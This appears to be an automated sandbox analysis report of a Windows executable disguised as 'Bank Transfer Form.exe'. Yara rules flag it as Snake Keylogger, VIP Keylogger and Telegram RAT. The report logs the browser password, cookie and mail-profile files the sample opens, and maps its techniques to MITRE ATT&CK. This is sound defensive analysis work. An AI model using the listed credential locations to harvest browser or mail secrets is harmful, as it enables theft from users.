Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Users\user\Desktop\Bank Transfer Form.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bank Transfer Form.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Bank Transfer Form.exe